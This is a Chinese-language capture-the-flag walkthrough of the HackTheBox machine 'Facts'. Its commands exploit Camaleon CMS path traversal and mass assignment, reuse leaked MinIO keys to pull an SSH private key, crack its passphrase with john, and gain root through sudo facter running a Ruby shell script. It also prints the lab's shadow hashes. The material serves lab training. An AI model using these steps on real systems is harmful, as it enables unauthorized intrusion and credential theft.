Facts - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Facts

端口扫描

22和80:

（需要全端口，还有个54321 minio）

$ nmap -sC -sV -Pn 10.129.20.119
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-05 15:10 JST
Nmap scan report for 10.129.20.119
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp open  http    nginx 1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
|_http-server-header: nginx/1.26.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.57 seconds

80

需要加hosts：

10.129.20.119 facts.htb

一个探索新事物的网站：

目录扫描

目录扫描可以找到admin：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://facts.htb/

/admin                (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]
/admin.php            (Status: 302) [Size: 0] [--> http://facts.htb/admin/login]
/admin

admin

自动跳到login,可以创建账号登录,Camaleon 2.9.0：

非预期 CVE-2024-46987

搜索可以找到一个相关漏洞：

• Goultarde/CVE-2024-46987: This Python PoC exploits CVE-2024-46987, a Path Traversal bug in Camaleon CMS 2.8.0 < 2.8.2 (work on 2.9.0). It allows authenticated users to read sensitive server files via the MediaController. Intended for authorized security auditing and educational research only.
  https://github.com/Goultarde/CVE-2024-46987

也可以直接手动测试:

之后一步步读文件,得到trivia私钥：

/home/trivia/.ssh/authorized_keys
/home/trivia/.ssh/id_ed25519

预期 CVE-2025-2304

预期方式是CVE-2025-2304：

• Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment · CVE-2025-2304 · GitHub Advisory Database
  https://github.com/advisories/GHSA-rp28-mvq3-wf8j

正常注册账号上去什么都没有，利用这个漏洞把自己变成管理员：

修改用户密码请求中，手动添加角色参数,然后重新登录，现在我们是admin：

admin

然后可以在setting里得到secret key：

AKIA0118A0EA12A9BCF8
1CVLRpd575INNAHwXPdSQqzXgwD0kuMNSZP37res
randomfacts
us-east-1
http://localhost:54321
http://facts.htb/randomfacts

Minio

之后就是使用得到的key访问minio：

export AWS_ACCESS_KEY_ID=AKIA0118A0EA12A9BCF8
export AWS_SECRET_ACCESS_KEY=1CVLRpd575INNAHwXPdSQqzXgwD0kuMNSZP37res
export AWS_DEFAULT_REGION=us-east-1

aws --endpoint-url http://facts.htb:54321 s3 ls

然后下载ssh私钥到本地,和非预期同样的方式破解出密码，根据私钥得到对应的公钥信息，其中包括用户名：

aws --endpoint-url http://facts.htb:54321 s3 cp s3://internal/.ssh/id_ed25519 .

ssh-keygen -y -f id_ed25519

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF1C/GcUgGwwa3TKrAe+Etsm1EEVEmgQ/qtoysWL4siC trivia@facts.htb

trivia & user flag

(从LFI直接到trivia是非预期)

trivia的私钥有密码保护，首先常规破解出密码：

ssh2john trivia_id_ed25519 > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

dragonballz

然后登录

ssh -i trivia_id_ed25519 trivia@10.129.20.119

user flag

trivia可以直接访问william用户目录：

facter to root

可以sudo运行facter，gtfobins：

• facter | GTFOBins
  https://gtfobins.org/gtfobins/facter/

可以运行指定目录下第一个rb文件，所以自己创建一个目录使用ruby执行系统命令即可：

mkdir /tmp/miao
echo -e '#!/usr/bin/env ruby\nsystem("/bin/bash")' > /tmp/miao/shell.rb
chmod +x /tmp/miao/shell.rb
sudo /usr/bin/facter --custom-dir=/tmp/miao

shadow

root:$y$j9T$7gs6EMa6c.zpFgKM3Grtz.$q8L7RyD.tdOf9DEhsqmEYBdKBrmxJ60ItpltO/x2nSB:20342:0:99999:7:::
trivia:$y$j9T$1fYkuzD9.m5y7SwWSTUqh/$hb29dYfEthOUaEZr8D1GriIfSkeu8YeiI2WWxMmoiG0:20342:0:99999:7:::
william:$y$j9T$L/LMpuHMall7H5uzpS/mL1$L1EJ9y7BdcE10UIxBSow2eStbt1SefLToaTh4hDacD2:20461:0:99999:7:::

参考资料

• Goultarde/CVE-2024-46987: This Python PoC exploits CVE-2024-46987, a Path Traversal bug in Camaleon CMS 2.8.0 < 2.8.2 (work on 2.9.0). It allows authenticated users to read sensitive server files via the MediaController. Intended for authorized security auditing and educational research only.
  https://github.com/Goultarde/CVE-2024-46987
• Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment · CVE-2025-2304 · GitHub Advisory Database
  https://github.com/advisories/GHSA-rp28-mvq3-wf8j
• facter | GTFOBins
  https://gtfobins.org/gtfobins/facter/